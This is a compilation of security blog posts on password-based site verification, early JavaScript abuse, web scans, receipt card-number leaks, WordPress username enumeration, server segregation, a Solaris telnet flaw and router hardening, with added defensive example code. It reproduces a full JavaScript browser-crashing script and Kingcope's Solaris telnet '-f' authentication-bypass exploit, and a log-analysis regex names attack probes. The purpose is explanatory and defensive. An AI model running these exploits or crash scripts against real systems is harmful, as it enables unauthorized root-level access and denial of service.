Gilbert Verdian - Security Advocate

Technorati Quick Claim - May I have your username and password please?

As I'm required to write this post to verify my blog using the traditional "Post Claim", I thought I might as well talk a little about it.

In setting up my blog in Technorati, there is a new option, "Quick Claim", to prove that you own the blog. It entails giving them your WordPress username and password so they can log in and verify the blog. But don't worry...

Note: Remember to use the username and password for your WordPress account, not your Technorati account. This will only be used once to verify that you own the blog. It will not be stored in our system.

[image: technorati-quick-claim.jpg]

Does anyone else see the problem with this? Here you go, here's my WordPress login and password. Even if the credentials are not "stored" in their system, as Technorati says, the details you type in have to sit somewhere, on disk (in a database?) or at least in memory, for their bots to read them and log in to verify the blog. So what happens after they are read? And what you hand over is the account's real password, not a token scoped to this one check: whoever holds it, however briefly, can do anything the account can, and you have no way to confirm that it was sent over TLS, kept out of log files and discarded afterwards.

I know other online services, such as Google Analytics, require you to upload a specific text file to the root of your site with only a key as its contents, which they then fetch with a GET /file1234.html to verify that you own the site. Surely this is a better way, although a little more technical work is needed.
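Here is the token-file scheme in code, as an added example that is not Technorati's or Google's own implementation. The path layout, the fetch() signature and the stand-in site are assumptions; the fetcher is injected so the example runs offline. The point worth seeing is what a careful verifier checks beyond "the URL returned 200": the body must equal the exact token, because many hosts answer every unknown path with a 200 catch-all page.

```python
"""Site-ownership verification by token file (added example, not Technorati's
or Google's code).  The verifier never learns a password: the owner publishes
a random token at a URL only the site's owner could create, and the service
fetches it.  fetch(url) -> (status, body) is an assumed client interface."""
import hmac
import secrets
from urllib.parse import urlparse

MAX_BODY = 1024  # a verification file is tiny; never compare a whole page


def issue_challenge():
    """Return (path, token).  The random value sits in the file name as well
    as the body, so a file created for one claim cannot satisfy another."""
    token = secrets.token_hex(16)
    return f"/{token}.html", token


def verify_ownership(site_url, path, token, fetch):
    """True only if the exact token is served from the claimed host."""
    parts = urlparse(site_url)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return False
    status, body = fetch(f"{parts.scheme}://{parts.netloc}{path}")
    if status != 200 or len(body) > MAX_BODY:
        return False
    # constant-time comparison of the trimmed body against the token
    return hmac.compare_digest(body.strip().encode(), token.encode())


class ConstructedSite:
    """Stand-in for the blog: a dict of path -> body.  soft_404=True models
    a host that returns 200 with a catch-all page for unknown paths, which
    is why a naive 'status == 200' check is not enough."""

    def __init__(self, files, soft_404=False):
        self.files, self.soft_404 = files, soft_404

    def fetch(self, url):
        path = urlparse(url).path
        if path in self.files:
            return 200, self.files[path]
        if self.soft_404:
            return 200, "<html><body>Sorry, page not found</body></html>"
        return 404, ""


if __name__ == "__main__":
    path, token = issue_challenge()
    site = ConstructedSite({path: token + "\n"})
    print("owner publishes", path, "->", verify_ownership("http://blog.example", path, token, site.fetch))
    print("soft-404 host   ->", verify_ownership("http://blog.example", path, token,
                                                ConstructedSite({}, soft_404=True).fetch))
```

The token never grants the verifier anything but the ability to read one public file, and it can be deleted as soon as the claim is done.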

The Origins of Scripting Web Vulnerabilities in our Browsers

I was thinking about the current situation we are experiencing with web vulnerabilities, specifically scripting and JavaScript, so I searched for the point at which our browsers started to incorporate JavaScript and found the following:

- Netscape 2.0 was the first version of Netscape with JavaScript support; it was released in March 1996: http://wp.netscape.com/eng/mozilla/2.0/relnotes/windows-2.0.html
- “Netscape version 2.0 introduced a bevy of must-have breakthrough features (frames, Java, Javascript and Plug-ins) which helped distance it from the pack…”
http://www.eskimo.com/~bloo/indexdot/history/netscape.htm

The following slides give good background on the JavaScript implementation:
http://www.geom.uiuc.edu/~slevy/si/u_pkg_java102/docs/javaone/industry/JavaScri.pdf

On the Internet Explorer side, it was IE 3.0, released in August 1996, which incorporated JavaScript (as JScript). Just as important, it also included VBScript.

“Version 3 included Internet Mail and News 1.0 and the Windows Address Book. It also brought the browser much closer to the bar that had been set by Netscape, including the support of Netscape’s plugins technology (NPAPI), ActiveX,frames, and a reverse-engineered version of JavaScript named JScript. Later, Microsoft NetMeeting and Windows Media Player were integrated into the product and thus helper applications became not as necessary as they once were. Cascading Style Sheets (CSS) were also introduced with version 3 of Internet Explorer.” - http://en.wikipedia.org/wiki/History_of_Internet_Explorer

It wasn't long after this that people found ways to abuse JavaScript:

<script language="JavaScript">

// Lock the browser in an endless modal dialog
function AnnoyingButton()
{
  while (true)
    window.alert("We have taken your Netscape session hostage. Now give us your money, the girl and everything else you got or we're going to break your legs.")
}

// Keep opening windows over and over again
function WindowBomb()
{
  var iCounter = 0 // dummy counter

  while (true)
  {
    window.open("http://www.netscape.com", "CRASHING" + iCounter, "width=1,height=1,resizable=no")
    iCounter++
  }
}

// Not as interesting as the other bombs, but this one forces the user to
// stay at the current page. User cannot switch to another page, or click
// stop to stop the reloading.
function ReloadBomb()
{
  history.go(0) // reload this page
  window.setTimeout('ReloadBomb()', 1) // tell netscape to hit this function
                                       // every millisecond =)
}

// Not a very interesting bomb, it does nothing really :>
function WhileLoopLock()
{
  while (true) {}
}

var szEatMemory = "GOBBLEGOBBLE" // our string to consume our memory

// Now this function EatMemoryInTime is an interesting one that could be
// placed on a timer for maximum nastiness :> I have been able to get
// up to 4Megs consumed by Netscape forcing my machine to crawl =)
// AND it's time driven! No while loops here!
function EatMemoryInTime()
{
  szEatMemory = szEatMemory + szEatMemory // keep appending (doubles every call)
  window.status = "String Length is: " + szEatMemory.length // report size
  window.setTimeout('EatMemoryInTime()', 1); // tell netscape to hit this function
}

var iNumberOfIterations = 0;

// The Timeout bomb sets up 4 timers which then call itself again, and again;
// watch the status bar to see how many times this function gets called.
function TimeBomb()
{
  window.status = "TimeBomb has been executed: " + iNumberOfIterations++ + " times";
  window.setTimeout('TimeBomb()', 1000);
  window.setTimeout('TimeBomb()', 1000);
  window.setTimeout('TimeBomb()', 1000);
  window.setTimeout('TimeBomb()', 1000);
}

</script>

The above is a script from around that time; it chews up CPU and memory until you have to hard-reset Windows 95. (Today's browsers clamp timer frequency and let you suppress repeated dialogs, but nothing of the kind existed in the browsers of the day.)

So more than ten years later, scripting, which was designed to enhance our web experience, is still being abused, but in very different ways, and now for financial gain rather than for the fun of crashing a browser.

Maybe its time we re-architect our browsers and re-think how we should experience the web all over again?

Should we bother when we’re scanned?

As security professionals we spend our time helping our organisations and clients secure their infrastructure, but what should we do when WE are scanned?

I've noticed in my logs numerous attempts using web application scanners, the latest one run on 21 June using Acunetix. As you know, this adds quite a bit of unnecessary traffic to your site, especially when all the options in the scanner are turned on and it runs every web test against each file and directory on your server. The following is a snapshot of the difference in traffic from the scan.

[image: scanned.jpg]

As you can see, jumping from under 1,000 requests to over 130,000 is quite a big jump.

Also got some recon using Google: "site:gilbertverdian.com php".

By the way, that IP is the transparent proxy of http://www.tpg.com.au, an Australian ISP. Users from that ISP seem to have been a little naughty lately.
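Spotting a scan like the one above in the access log does not need an IDS; the signals are a burst of requests from one source, a high share of 404s from file guessing, injection and traversal strings in the paths, and often the scanner naming itself in the User-Agent. The script below is an added example, not the post's own tooling: it parses Apache combined-format lines and reports per-IP reasons. The log lines are constructed, and the Acunetix User-Agent string and the thresholds are assumptions to tune for your own site.

```python
"""Flag web-scanner activity in Apache combined-format logs (added example,
not from the original post).  Sample lines are constructed; the scanner
User-Agent substrings and the thresholds are assumptions."""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

SCANNER_UA_MARKERS = ("acunetix", "nikto", "nessus", "sqlmap")  # assumed substrings
PROBE = re.compile(r"(\.\./|%27|%3C|<script|/etc/passwd|\bunion\b)", re.I)
RATE_WINDOW = timedelta(seconds=60)
RATE_LIMIT = 60        # more hits than this inside any 60 s window
NOT_FOUND_RATIO = 0.5  # more than half of the requests 404: file/directory guessing
MIN_REQUESTS = 20      # don't judge the 404 ratio on a handful of requests


def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def max_hits_in_window(times, window):
    """Largest number of requests that fall inside any span of length `window`."""
    times = sorted(times)
    best = lo = 0
    for hi, t in enumerate(times):
        while t - times[lo] > window:
            lo += 1
        best = max(best, hi - lo + 1)
    return best


def analyze(lines):
    """Return {ip: {"requests": n, "reasons": [...]}} for suspicious sources only."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)
    report = {}
    for ip, recs in by_ip.items():
        reasons = []
        if any(mark in r["ua"].lower() for r in recs for mark in SCANNER_UA_MARKERS):
            reasons.append("scanner user-agent")
        peak = max_hits_in_window([r["ts"] for r in recs], RATE_WINDOW)
        if peak > RATE_LIMIT:
            reasons.append(f"{peak} requests inside 60 s")
        if len(recs) >= MIN_REQUESTS:
            ratio = sum(r["status"] == 404 for r in recs) / len(recs)
            if ratio > NOT_FOUND_RATIO:
                reasons.append(f"{ratio:.0%} of requests returned 404")
        probes = sum(bool(PROBE.search(r["path"])) for r in recs)
        if probes:
            reasons.append(f"{probes} injection/traversal probes")
        if reasons:
            report[ip] = {"requests": len(recs), "reasons": reasons}
    return report


# --- constructed sample log: five normal visits and one Acunetix-style scan ---
def _line(ip, when, path, status, ua):
    stamp = when.strftime("%d/%b/%Y:%H:%M:%S %z")
    return f'{ip} - - [{stamp}] "GET {path} HTTP/1.1" {status} 512 "-" "{ua}"'


NORMAL_UA = "Mozilla/5.0 (Windows; U; Windows NT 5.1) Gecko/20070515 Firefox/2.0.0.4"
SCANNER_UA = "Mozilla/5.0 (compatible; Acunetix Web Vulnerability Scanner)"  # assumed


def sample_log():
    base = datetime(2007, 6, 21, 10, 15, tzinfo=timezone(timedelta(hours=10)))
    lines = [_line("203.0.113.7", base + timedelta(minutes=5 * i), "/index.php", 200, NORMAL_UA)
             for i in range(5)]
    for i in range(150):
        probe = i % 3 == 0
        path = "/index.php?id=1%27" if probe else f"/wp-content/guess{i}.php"
        lines.append(_line("198.51.100.23", base + timedelta(milliseconds=300 * i),
                           path, 200 if probe else 404, SCANNER_UA))
    return lines


if __name__ == "__main__":
    for ip, info in analyze(sample_log()).items():
        print(ip, info["requests"], "requests:", "; ".join(info["reasons"]))
```

A source that trips several of these at once is almost certainly a scanner rather than a busy reader, which is the evidence you would want before deciding whether to write to the ISP's abuse desk.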

My setup is quite standard: hosted by DreamHost, running WordPress with a MySQL database and a couple of WordPress plugins. If someone really wants to break in, all they have to do is set up a VMware LAMP server on Linux, install WordPress, emulate this environment and have a go against their own virtual host. They might even earn some 0-day credit if they find bugs.

I know of other security professionals who have had their own servers broken into in the past (not mentioning any names, Johnny ;) because they didn't patch ssh about 4 years ago), but he admitted to getting lazy and not patching an old version, and moved on...

So the question stands, what do we do about it? Should we follow this up with the ISP? Or just let it go? What do you guys do?

Insecurity of Receipts - Part 2

Just came back from a trip to Scotland and, before throwing a receipt in the bin, noticed that this one printed everything except the last 4 digits of the card, whereas another receipt I had contained only the last 4 digits. Not good having these two receipts together.

Coincidentally, on Digg last week the following WSJ story explains how consumers are bringing class-action lawsuits against large retailers for printing too many digits on receipts. The story states:

In the US,

as of Dec. 4, retailers are prohibited from printing more than the last five digits of a credit-card or debit-card account number on receipts that are handed to customers. The receipts also can’t include the account’s expiration date. The law applies only to electronically printed receipts, rather than those that are written by hand or imprinted on old-fashioned manual machines.

So the retailer is the party now liable for using a product whose vendor failed to meet current laws and regulations, rather than the vendor of the point-of-sale system itself. Privacy is such a concern for consumers, as it should be, that we now do anything in order to protect our personal data. Imagine this in another context, where the user of a system is liable for a fault of the manufacturer or vendor.

So far there have been "100 federal lawsuits seeking class-action status against big merchants such as Rite Aid Corp., Wendy's International Inc., FedEx Corp., TJX Cos. and Inter Ikea Systems BV."

The best case would be if other countries adopted something similar as law, or the requirement became part of PCI (PCI DSS requirement 3.3 already limits a displayed card number to at most the first six and last four digits, which is looser than the US rule's last five). This should be a catalyst for point-of-sale vendors to step up and address this insecurity, or they themselves may face legal liability the same way retailers do; we'll just have to wait and see what happens in this space.

The Insecurity of Receipts and what you throw in the trash

In my travels I am still amazed at how many point-of-sale systems around the world still print people's full credit card number and expiry date on receipts.

Most usually X out all the numbers except the last 4 digits and the expiry date, which is good, but even so, do they really need to print the expiry as well? Dumpster diving, sifting through people's trash, is quite a common method of identity theft: it involves sorting through household trash or corporate dumpsters to find information that can be used for malicious purposes. Many famous hacks in the past have involved finding system manuals, usernames and passwords, and corporate directories in the trash.

Imagine you have a letter from your bank with your new credit card; the letter contains only your account number, which is the new card number. You then go to the store, make a purchase and are given a receipt with only the last 4 digits and the expiry date, and finally you write down the CVV from the back of the card on a piece of paper when you make an online purchase. All these documents go into the trash for trash day...

Now all someone has to do is find all of the above and they have your credit card details and your personal information; it's about piecing together small amounts of information to get the bigger picture.

Please take the time to check your receipts and papers you throw away no matter where you are and for best results, shred everything with a good quality shredder before it goes in the trash.
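For the two receipt posts above, here is an added example (not code from the posts) of what a merchant or an auditor can run over printed receipt text: it flags a full card number (13 to 19 digits passing the Luhn check), a masked number that still shows more digits than the quoted US rule allows, and a stand-alone MM/YY expiry, and it shows the truncation a point-of-sale printer should apply. The receipts are constructed and use the 4111 1111 1111 1111 Visa test number; the digit limit is an assumption taken from the law quoted above.

```python
"""Receipt leak checks and PAN truncation (added example, not from the post).
Sample receipts are constructed; MAX_VISIBLE_DIGITS follows the US truncation
rule quoted above and is an assumption to adjust to local policy."""
import re

# 13-19 card positions, each a digit or a mask character, optionally separated by
# one space or hyphen, and not embedded inside a longer alphanumeric token.
PAN_TOKEN = re.compile(
    r"(?<![0-9A-Za-z*#])(?:[0-9X*#](?:[ -](?=[0-9X*#]))?){13,19}(?![0-9A-Za-z*#])")
# MM/YY or MM/YYYY standing alone, not the middle of a DD/MM/YYYY purchase date.
EXPIRY = re.compile(r"(?<![\d/])(?:0[1-9]|1[0-2])/(?:\d{4}|\d{2})(?![\d/])")
MAX_VISIBLE_DIGITS = 5  # no more than the last five digits may be printed


def luhn_ok(digits):
    """Luhn check: true for any syntactically valid card number."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def find_receipt_leaks(text):
    """Return (line_no, kind, snippet) for every problem found on a receipt."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        for m in PAN_TOKEN.finditer(line):
            token = m.group()
            digits = re.sub(r"\D", "", token)
            fully_visible = len(digits) == len(re.sub(r"[ -]", "", token))
            if fully_visible:
                if luhn_ok(digits):  # all digits and a valid PAN
                    findings.append((n, "full PAN", token))
            elif len(digits) > MAX_VISIBLE_DIGITS:
                findings.append((n, "over-exposed PAN", token))
        m = EXPIRY.search(line)
        if m:
            findings.append((n, "expiry date", m.group()))
    return findings


def truncate_pan(pan, keep_last=4, mask="X"):
    """What the printer should do: mask everything but the last four digits."""
    digits = re.sub(r"\D", "", pan)
    if not 13 <= len(digits) <= 19 or not luhn_ok(digits):
        raise ValueError("not a card number")
    return mask * (len(digits) - keep_last) + digits[-keep_last:]


# --- constructed receipts ---
BAD_RECEIPT = """\
Edinburgh Gift Shop
21/06/2007 14:02
VISA 4111 1111 1111 XXXX
EXP 05/09
AUTH 123456
TOTAL 24.50
"""
GOOD_RECEIPT = """\
Edinburgh Gift Shop
21/06/2007 14:02
VISA XXXX XXXX XXXX 1111
AUTH 123456
TOTAL 24.50
"""
FULL_PAN_RECEIPT = "CARD 4111111111111111 EXP 12/08"

if __name__ == "__main__":
    for name, receipt in [("bad", BAD_RECEIPT), ("good", GOOD_RECEIPT), ("full", FULL_PAN_RECEIPT)]:
        print(name, find_receipt_leaks(receipt))
    print(truncate_pan("4111 1111 1111 1111"))
```

The Luhn check keeps order and invoice numbers from being reported as card numbers most of the time (about one random digit string in ten passes it), so treat a "full PAN" finding as something to look at rather than proof on its own.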

The Security Message is Spreading

I overheard a conversation that put a smile on my face. A friend of a relative was talking to her about the internet and more specifically eBay, the tone changed very quickly as the first thing mentioned was how risky online transactions are.

“Oh, I never put any credit card details online, it’s not safe!” She later went on to inform everyone how it is important to have the “lock” on sites and how some friends were subject to some credit card fraud.

I also hear from many people how they have the latest antivirus and anti-spyware on their machines. When I ask what they do to keep secure, non-technical people turn out to be technically savvy, usually responding along the lines of "I have Norton Antivirus, run Ad-Aware once a week (sometimes daily!) and now use Firefox instead of Internet Explorer".

But why does it have to be this way? Imagine the same constraints on something essential to us in the physical world, our cars. For argument's sake, say we spend 80% of our time on computers fixing and maintaining them so that we can use them for the remaining 20%. Imagine doing the same to your car every day! You would have to get up very early and start tweaking the motor, changing the oil, fixing the brakes and so on for 48 minutes, just to drive to work, which is 12 minutes away... that is certainly something no one would put up with. So why are we accepting this for our computers? To help out, I recommend people switch to a Mac for their next machine, just because they are not going to waste all that time fixing and maintaining it; they will just be able to get on with the work they intended to do in the first place.

Many of the converted have recommended that I go and work at Apple, as I do such a good job of selling it to them, or have asked whether I DO work at Apple... There was a head-of-security job going there about 2 years ago that I had a look at. Maybe sometime in the future, if something similar comes up?

It’s great to see an understanding being spread about the risks and protecting personal information online. Security education and awareness is quite an important factor in the security process to make things a little safer for people online.

Great job people!

Wordpress 2.1.2 Authentication Information Disclosure

Found an information disclosure during authentication to a WordPress 2.1.2 blog.

When a person logs in to /wp-admin with a wrong username, the error message states "ERROR: Incorrect username".

[image: nonexistantusername.png]

Whereas if you enter the correct username and the wrong password, you get the following.

[image: existingusername.png]

The problem is that WordPress discloses that the username doesn't exist, which gives someone who wants to brute-force username/password combinations more information. Once they have confirmed a valid username (other than the default admin), they have only one field left to brute-force, reducing the time needed.

The fix is a single message, such as "ERROR: Incorrect username/password", that does not reveal which half was wrong. The two failure paths should also take the same amount of time; if the password hash is only computed when the username exists, the same information leaks through the response time.
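The following is an added example, not WordPress code, showing the leaky login beside the hardened one and the one-line oracle an attacker builds from the leak. The user store and the PBKDF2 hashing are constructed for the demo; the hardened version hashes against a throw-away record when the username is unknown so that both failures cost the same time.

```python
"""Uniform login failure (added example, not WordPress code).  The user store
and password hashing are constructed for the demonstration."""
import hashlib
import hmac
import os

ITERATIONS = 50_000


def hash_password(password, salt=None):
    salt = salt if salt is not None else os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


# Constructed user store: username -> (salt, hash).
USERS = {"gilbert": hash_password("correct horse battery")}

# Throw-away record used for unknown usernames, so a missing user costs the
# same work as a wrong password and timing does not reveal which it was.
_DUMMY = hash_password(os.urandom(16).hex())


def login_vulnerable(username, password):
    """The 2.1.2 behaviour: two different errors, so the attacker learns which
    usernames exist and only has the password left to guess."""
    if username not in USERS:
        return "ERROR: Incorrect username"
    salt, stored = USERS[username]
    if hash_password(password, salt)[1] != stored:
        return "ERROR: Incorrect password"
    return "OK"


def login_hardened(username, password):
    """One message, and the same amount of work, for both failure cases."""
    salt, stored = USERS.get(username, _DUMMY)
    candidate = hash_password(password, salt)[1]
    if hmac.compare_digest(candidate, stored) and username in USERS:
        return "OK"
    return "ERROR: Incorrect username/password"


def enumerate_users(login, candidates):
    """What an attacker does with the leak: any name whose error differs from
    the one a certainly-nonexistent name receives is a confirmed account."""
    baseline = login(os.urandom(8).hex(), "x")
    return [u for u in candidates if login(u, "x") != baseline]


if __name__ == "__main__":
    names = ["admin", "gilbert", "webmaster"]
    print("leaky login confirms:   ", enumerate_users(login_vulnerable, names))
    print("hardened login confirms:", enumerate_users(login_hardened, names))
```

Rate limiting and lockout help too, but they are a separate control; without the uniform message an attacker still halves the search space on the first request.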

WordPress.org was notified on 8 March via wordpress.org/support and security@wordpress.org.

Why having different web functions on the one box is a bad idea

Sometimes security is ignored because of timelines, money, politics and so on. I recently had to explain why having different web functions on the one physical box is a bad idea:

- Good security practice recommends separating different functions, especially in a web environment, onto different systems.
- With the functions on different systems, firewalls can control what is allowed to pass through to each system.
- For example, the application server running the middleware only needs to talk to the database server on the SQL port to run queries.
- Controls can therefore be put in place, on each system and on the firewalls between them, governing how and what is accessed.
- Assume that each server may be sacrificed in the worst case, i.e. that it will be compromised. With that in mind, we have to limit the damage that one server's compromise can do. Set up as described above, a compromised server gives the attacker access to that server only. But with all the web functions on the same server, a vulnerability in just one of them gives access to all the data of every function. The same applies to servers that are physically or logically on the same network without controls restricting access between them.
- The final risk is the underlying operating system. If there is a vulnerability in the OS of the server, again the attacker can reach the data of every function hosted on it, however well each application is written.
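The segregation argument above comes down to an explicit allow-list between tiers with everything else dropped. As an added example (not from the original post; hosts, ports and tier names are assumptions), the script below models that policy, answers "may this connection happen?", reports which tiers a compromised box can reach directly, and renders the equivalent iptables rules for a router sitting between the tiers.

```python
"""Three-tier segregation as a default-deny allow-list (added example, not
from the original post).  Addresses, ports and tier names are assumptions."""
from collections import namedtuple

Flow = namedtuple("Flow", "src dst proto port")

# Which hosts belong to which tier (constructed addresses).
TIERS = {
    "internet": ["0.0.0.0/0"],
    "web": ["10.0.1.10"],
    "app": ["10.0.2.10"],
    "db": ["10.0.3.10"],
}

# The only flows the firewalls between tiers permit; anything else is dropped.
ALLOWED = [
    Flow("internet", "web", "tcp", 443),
    Flow("web", "app", "tcp", 8080),
    Flow("app", "db", "tcp", 3306),
]


def tier_of(ip):
    for tier, hosts in TIERS.items():
        if ip in hosts:
            return tier
    return "internet"  # anything we don't know about is untrusted


def is_allowed(src_ip, dst_ip, proto, port):
    """The decision a tier firewall makes for one new connection."""
    wanted = Flow(tier_of(src_ip), tier_of(dst_ip), proto, port)
    return wanted in ALLOWED


def blast_radius(compromised):
    """Tiers an attacker on `compromised` can open connections to directly,
    i.e. the data put at risk by that one box.  On a single shared server
    this would be every function at once."""
    return sorted({f.dst for f in ALLOWED if f.src == compromised})


def render_iptables():
    """Turn the allow-list into iptables commands for a router between the
    tiers: default DROP, replies allowed back, listed flows only."""
    rules = [
        "iptables -P FORWARD DROP",
        "iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT",
    ]
    for f in ALLOWED:
        for s in TIERS[f.src]:
            for d in TIERS[f.dst]:
                rules.append(f"iptables -A FORWARD -s {s} -d {d} -p {f.proto} "
                             f"--dport {f.port} -m state --state NEW -j ACCEPT")
    return rules


if __name__ == "__main__":
    print("web -> db:3306 allowed?", is_allowed("10.0.1.10", "10.0.3.10", "tcp", 3306))
    print("blast radius of web tier:", blast_radius("web"))
    print("\n".join(render_iptables()))
```

The useful property is that the web tier, the one facing the internet and most likely to be compromised, has no rule that lets it speak to the database at all; an attacker there has to find a second hole in the application tier before the data is in reach.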

Solaris Telnet Vulnerability…Again?

This is a serious oversight in something so trivial. Just check out this publicly released code on PacketStorm and how little is needed to become any user on the system:
#!/bin/sh
# CLASSIFIED CONFIDENTIAL SOURCE MATERIAL
#
# *********************ATTENTION********************************
# THIS CODE _MUST NOT_ BE DISCLOSED TO ANY THIRD PARTIES
# (C) COPYRIGHT Kingcope, 2007
#
################################################################
echo ""
echo "SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope kingcope@gmx.net"
if [ $# -ne 2 ]; then
echo "./sunos <host> <user>"
echo "./sunos localhost bin"
exit
fi
echo ""
echo "ALEX ALEX"
echo ""
# the "username" -f<user> reaches /bin/login as an argument, which reads it as -f <user>
telnet -l"-f$2" $1

The telnet daemon, in.telnetd, and especially the Solaris/SunOS one, has had quite a number of problems in the past; here's an old exploit relating to a problem with TTYPROMPT, for which the vulnerable systems were SunOS 5.5, 5.5.1, 5.6, 5.7 and 5.8.

This new vulnerability is similar to the old one in that a client-supplied value is the problem again, but it is not a buffer overflow and needs no shellcode. The username sent with telnet's -l option travels to the server as the USER environment variable, and in.telnetd hands it to /bin/login unchecked as a command-line argument; a "username" of -fbin is therefore parsed by login as the option -f bin, and -f tells login that the named user has already been authenticated (CVE-2007-0882). That is the whole exploit: option injection through a field that should only ever have been data.
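To make the bug class concrete, here is an added example that models the hand-off from the telnet daemon to login. It is not Sun's code: the option letters (-p, -h host, -f name) follow login(1)'s documented ones, but the argv layout is an assumption made to show the defect and its fix, which is to reject any login name that could be parsed as an option and to end option processing with "--" before the name.

```python
"""Model of the in.telnetd -> /bin/login hand-off behind the exploit above
(added example, not Sun's code; the argv layout is an assumption).  Nothing
is executed: argv lists are built and parsed the way getopt would."""
import getopt
import re


def parse_login_argv(argv):
    """How login(1) reads its command line: -f name means 'name is already
    authenticated, skip the password prompt'."""
    opts, rest = getopt.getopt(argv[1:], "pf:h:")
    o = dict(opts)
    return {"preauthenticated": "-f" in o,
            "user": o["-f"] if "-f" in o else (rest[0] if rest else None)}


def login_argv_unsafe(remote_host, user):
    """The daemon drops the client-supplied name straight into argv, so a
    name beginning with '-' becomes an option to login."""
    return ["/bin/login", "-p", "-h", remote_host, user]


VALID_USER = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]*")


def login_argv_safe(remote_host, user):
    """Refuse anything that is not a plain account name, and end option
    processing with '--' (assumes login's getopt honours it) so the name can
    only ever be a positional argument."""
    if not VALID_USER.fullmatch(user):
        raise ValueError(f"rejected login name: {user!r}")
    return ["/bin/login", "-p", "-h", remote_host, "--", user]


if __name__ == "__main__":
    print("unsafe, -l -fbin :", parse_login_argv(login_argv_unsafe("10.0.0.5", "-fbin")))
    print("unsafe, -l alice :", parse_login_argv(login_argv_unsafe("10.0.0.5", "alice")))
    try:
        login_argv_safe("10.0.0.5", "-fbin")
    except ValueError as e:
        print("safe             :", e)
```

The same pattern, client data landing in an argv slot that a later program parses for options, turns up wherever one process execs another with untrusted strings, which is why the allow-list on the name matters more than the "--".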

These days telnet is seldom used for Unix logins; SSH is preferred because of its encryption and extra security options, although telnet is still around on network devices such as routers and switches that don't support SSH.

Protect your broadband routers

A researcher at Symantec today announced new threats against broadband routers.

This involves malicious users logging into the router, changing the DNS settings and thus redirecting users to fake sites to steal their information. This is not new; the threat has been around for quite a while, and it comes down to guessing passwords to obtain access to systems. In Symantec's "drive-by pharming" variant the login request is sent by a web page running in the victim's own browser, from inside the LAN, using the default password, so turning off remote management alone does not stop it; changing the password does. No matter how much security is in place, one small mistake or oversight by a user can compromise everything.

Just have a look at Phenoelit’s Default Password List and find your device on the list.

To protect against this threat:
- ALWAYS change the default username and password to something other than "admin"/"password".
- Never turn on remote management on the router; home users really don't need it.
- Stop the device responding to pings; hiding helps a little, since your connection won't show up in a ping sweep when people are looking for easy targets, though a scanner that probes TCP ports directly will still find you.

Something for vendors: ship with a blank initial password that forces the user to set one during first-time setup, don't answer pings, and keep the remote management ports off. To go further:
- block all inbound connections on the stateful firewall for TCP, UDP, ICMP and so on
- present a fake TCP stack fingerprint; if a scanner identifies the device as an obscure piece of old networking equipment the attacker has never heard of, they may move on
- implement basic IPS capabilities to detect common attacks and block them; a port scan against the router should trigger an automatic firewall rule blocking that IP (with the caveat that anyone who can spoof source addresses could then use the feature to lock out addresses you rely on, such as your ISP's DNS servers)

Something to think about…